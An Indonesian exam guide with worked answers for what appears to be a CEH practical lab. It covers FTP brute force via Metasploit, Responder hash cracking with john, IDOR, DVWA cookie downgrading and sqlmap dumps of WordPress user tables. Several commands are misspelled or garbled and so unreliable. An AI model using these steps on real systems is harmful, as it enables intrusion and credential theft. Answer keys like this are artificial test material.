Anda di halaman 1dari 3

Kisi-kisi ujian

1. soal pertama: bersifat cerita, "Pada direktori dokumen terdapat beberapa Gambar,
temukan Nomor Yang dapat ditemukan pada salah satu Gambar yang tersedia di
direktori dokumen itu
(ini direktorinya ada di Windows server Kita sendiri)

This PC--->CEH Tools--->Module 06---->steganography tools--->image tools--->quick


stego--->masuk ke direktori Document---> Buka Satu persatu gambarnya dan ambil
pesan tersembunyinya.

2. didalam salah satu server ada layana FTP. Retas kelayanan itu dan ambil datanya,
tulis datanya.

dari hasil #nmap -sV, cari FTP yang terbuka


#nmap -p21 10.10.10.0/24

#msfconsole
msf4>use auxaliary/scanner/ftp/ftp_begin
msf4> set RHOSTS 10.10.10.16
msf4> set USER_FILE /root/Desktop/Wordlist/Username.txt
msf4> set PASS_FILE /root/Desktop/Wordlist/Password.txt
msf4> set VERBOSE false
msf4>run

ftp 10.10.10.16
ftp>dir
nama_file.txt
ftp> get nama_file.txt
ftp>bye
cat isinya...

3. ada salah satu server menggunakan apache, maka carilah versi apache yang
digunakan oleh server itu
cari dari seluruh hasil nmap -sV yang ada port 80 dan menggunakan apache.

4.ada salah satuserver yang membuka salah satu remote service, beritahukan berapa
ip server ip itu dan windows apa (ingat selain server anda)

cari port 3389, itu adalah port remote device


kembali ke windows kita--->lihat IP kita----> 10.10.10.12---->berarti target kita
adalah selain IP yang di sebelah

#rdesktop 10.10.10.12

5. seorang konsultan mendapati situasi bahwa perusahaan x telah tercompromise,


kemudian konsultan ini melihat ada salah satu file yang sudah di modifikasi oleh
attacker, dari sekian banyak file, dirinya pun menduga ada 1 file lain lagi yang
sudah di modifikasi oleh attacker, carilah nama file tersebut. (dengan
membandingkan dengan nilai md5 hash nya)
(terletak di direktori document/secret).

jika nilai hashnya tidak ada----> maka itulah jawaban yang tercompromise/
dimodifikasi oleh attacker.

6.cari nomor telepon syarif pada situs abc.com.


gunakan credentials berikut:
username:abc password: xyz
buka situs abc.com---> login dengan cerendtials yang diberikan. masuk ekhalaman
myprofile/profile/contact
http.//www.abc.com?id=1 --> admin
http.//www.abc.com?id=2 --> zaid
http.//www.abc.com?id=3 --> zubair
http.//www.abc.com?id=4 --> syarif --->nomor teleponnya
http.//www.abc.com?id=5
http.//www.abc.com?id=6

insecure direct object reference (IDOR)

7. pada salah satu server ada layanan SNMP yang aktif, carilah berapa IP servernya.

#nbtscan 10.10.10.0/24
10.10.10.12 ---> ip kita
10.10.10.11
10.10.10.13

#snmp -check -c public 10.10.10.16


#snmp -check -c public 10.10.10.16
#snmp -check -c public 10.10.10.16
#snmp -check -c public 10.10.10.16
#snmp -check -c public 10.10.10.16
#snmp -check -c public 10.10.10.16

#nmap -sU 10.10.10.0/24


---> cari port 161 SNMP UDP yang hidup
---> lalu, eksekusi dengan cnmp -check
#cnmp -check -c public 10.10.10.0.24

8. pada suatu kesempatan, suatu konsultan berhasil mengambil hash dari target
dengan menggunakan responder, carilah plaintext password dari log responder
(hint: nama filenya adalah abc.txt)

letak
#cd/usr/share/responder
#ls
#cd logs
#john abc.txt

----> nilai password


----> kiri (nilai password) : kanan(username)
./responder.py -I eth0.

9. ada suatu file pcapnp di direktori document yang berisikan komunikasi korban ke
web, didalamnya ada pass untuk login, carilah passwordnya untuk login

10. ada suatu aplikasi (katakanlah pada HEG.com) yang menggunakan wordpress yang
telah diretas oleh seseorang, kemudian didapati ada akun bernama John yang passnya
di ganti, tugas anda sekarang adalah mencari tahu apa nilai password john yang baru

#nmap -p80 10.10.10.0/24

kemudian, ada salah satu IP yang ketika port 80 diakses, maka dia akan mengarhkan
kita ke halaman WAMP.

10.10.10.90
http://10.10.10.90/ --->WAMP
http://10.10.10.90/HEC
http://10.10.10.90/DVWA

seandainya ada direktori namanya microsoft

http://10.10.10.90microsoft

login ke DVWA ---> username : admin password ---> password

dibagian cookie, ada parameter "security"


ganti nilai dari parameter security dari high/imposibble ke low

katakanlah nanti ada sekitar 6 database, maka lupakanlah database DVWA dan cari
database yang namanya tidak jauh dari aplikasi wordpress yang dipakai HEC.com

emunerasi table:
#qslmap -r nama direktori_yang dibuat -D nama_database --tables
#qslmap -r nama direktori_yang dibuat -D nama_database -T wp_users --columns
enumerasi field/data
#qslmap -r nama direktori_yang dibuat -D nama_database -T wp_users -C
usename,password,email --dump

11. ada suatu aplikasi yang sangat rentan.


temukan yang ada di dalam aplikasi ini. (tidak termasuk tamu)
hint: username admin
password :password

#qslmap -r nama direktori_yang dibuat --dbs


#qslmap -r nama_direktori_ yang dibuat -D --tables
#qslmap -r nama direktori_yang dibuat -T users --columns
#qslmap -r nama direktori_yang dibuat -T users ,first_name,last_name --dump

12. beritahukan apa nama aplikasi yang digunakan oleh layanan FTP.

#nmap -p21 10.10.10./024 ---> cari port FTP (port 21)


didapat misalnya IP 10.10.10.200
#nmap -sV 10.10.10.200
operating system (dibawah hasil nmap)
apabila tidak keluar/ nmapnya ragu-ragu, maka gunakan opsi #nmap -A 10.10.10.2000

13. ada suatu aplikasi (katakanlah good shopping) yang terdeteksi rentan didalamnya
terdapat beberapa nama user, maka carilah siapa nama user pemilik id 11.

database shopping
emunerasi tabel user
enumerasi kolom ID, username,nama depan, nama belakang
lalu lihat siapa pemilik nomor 11.

Anda mungkin juga menyukai